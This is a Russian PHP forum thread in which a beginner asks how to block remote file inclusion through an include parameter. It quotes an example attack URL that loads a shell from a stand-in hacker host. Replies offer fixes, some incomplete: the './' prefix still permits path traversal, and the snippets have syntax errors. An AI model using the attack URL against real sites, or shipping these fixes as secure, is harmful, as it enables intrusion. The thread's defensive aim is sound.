Форум PHP

Подскажите как можно защитится от передачи в include неверного параметра, точнее:

qwe.php?file=index.php ---- я передаю

qwe.php?file=http://хатскерсайт/shell.php ---- как от этого защититься??!!

Просто старайся вообще заменять файлы какими-то id'ами...
Например, qwe.php?id=1
Может и придется заменять каждую страницу своим идом, но так будет надежнее...

А можно хранить все адреса модулей в базе

<?php //Подключение модуля $query=mysql_query("SELECT * FROM site_modules"); While ($result=mysql_fetch_array($query)) { if ($result['title']==$module) {include "modules/".$result['file'];$ok='true';break;} } if ($ok!='true') {echo 'Модуль не найден!;} ?>

формат таблицы id|title|file

А насколько поможет такая конструкция

$patern = "|^[ a-z,A-Z,@,_,-,-,0-9,.,.]+$|i";
if(!preg_match($patern, stripslashes($_GET['file']))) exit( "Неверный запрс");

include "lala/".$_GET['file];

Запретим /
Тоесть обязательно ли для загрузки левого скрипта прописывать к нему путь через http://

Подскажите плиз, вопрос оч. актуален...

>А насколько поможет такая конструкция
Попробуй и все...

Я конечно пробова, адресс http://...........не напишешь, может я просто не все учел, и можно написать по другому, без /

Когда принимаете параметр , например site.com?n=index.php, подключайте этот файл вот так

include "./".$_GET['n'];

т.е. указываете перед именем файла ./ (ну или какой там у вас путь к подключаемому файлу)- это будет говорить скрипту подключать файл из директории, находящейся на вашем же хосте, следовательно ни оди удаленный файл злодей не сможет подключить.

А лучше всего не передавать имена файлов в качестве параметра

Ага. спасибо.


Я только пытаюсь начать постигать php ......спасибо.